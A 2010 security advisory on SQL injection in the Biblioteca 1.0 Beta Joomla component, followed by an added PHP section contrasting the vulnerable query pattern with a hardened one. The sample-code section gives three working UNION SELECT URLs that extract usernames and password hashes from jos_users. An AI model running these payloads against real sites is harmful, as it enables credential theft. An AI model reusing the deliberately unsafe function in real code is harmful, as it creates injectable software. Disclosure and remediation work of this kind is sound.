Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
Name              Biblioteca
Vendor            http://www.cielostellato.info
Versions Affected 1.0 Beta
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-08-21
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
Component that allows the automatic management of a
library in electronic format. It can manage books and
their loans through an attractive graphical user
interface that is simple and usable.
II. DESCRIPTION
_______________
This component doesn't use the common Joomla functions
to get the parameters' values from GET, POST, etc., and
none of these values are properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
B) Multiple SQL Injection
A) Multiple Blind SQL Injection
_______________________________
The parameter testo passed to bi.php (site and admin
frontends) is not properly sanitised before being used in a
SQL query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
B) Multiple SQL Injection
_________________________
The parameter testo passed to stampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca")
is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
V. FIX
______
No fix.
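Since the advisory ships no patch, the following is an added example (not code from the Biblioteca component or its vendor) showing the pattern the advisory describes, a raw request value concatenated into a LIKE search, next to the same lookup written with the Joomla 1.5 request and database API. The table and column names (#__biblioteca_libri, titolo, autore) and the function names are assumptions for illustration.

```php
<?php
// Reconstruction of the vulnerable pattern described in the advisory: the
// value of testo is taken straight from $_GET and pasted into the query, so a
// value that closes the quoted string can append arbitrary SQL.
// (Table/column names are assumed, not taken from the component.)
function cercaLibriVulnerabile()
{
    $db    = JFactory::getDBO();
    $testo = $_GET['testo'];
    $query = "SELECT * FROM #__biblioteca_libri WHERE titolo LIKE '%" . $testo . "%'";
    $db->setQuery($query);
    return $db->loadObjectList();
}

// Hardened form of the same search.
function cercaLibriSicuro()
{
    $db = JFactory::getDBO();

    // 1. Read the parameter through JRequest with an explicit 'string' filter
    //    (Joomla 1.5 API), so only a filtered string from the GET array is used.
    $testo = trim(JRequest::getVar('testo', '', 'get', 'string'));

    // 2. Reject empty or over-long search terms before touching the database.
    if ($testo === '' || strlen($testo) > 100) {
        return array();
    }

    // 3. Escape for the LIKE context: getEscaped($text, true) escapes quotes and
    //    also the LIKE wildcards % and _; Quote(..., false) then wraps the
    //    already-escaped pattern in quotes without escaping it a second time.
    $pattern = $db->Quote('%' . $db->getEscaped($testo, true) . '%', false);

    // 4. Select only the columns the page needs; the injected value can no
    //    longer break out of the string literal.
    $query = 'SELECT id, titolo, autore FROM #__biblioteca_libri'
           . ' WHERE titolo LIKE ' . $pattern;
    $db->setQuery($query);
    return $db->loadObjectList();
}
```

The same treatment applies to every script named in section III; the Joomla request and database layers, not the component's own string handling, should be the only path from a request parameter to a query.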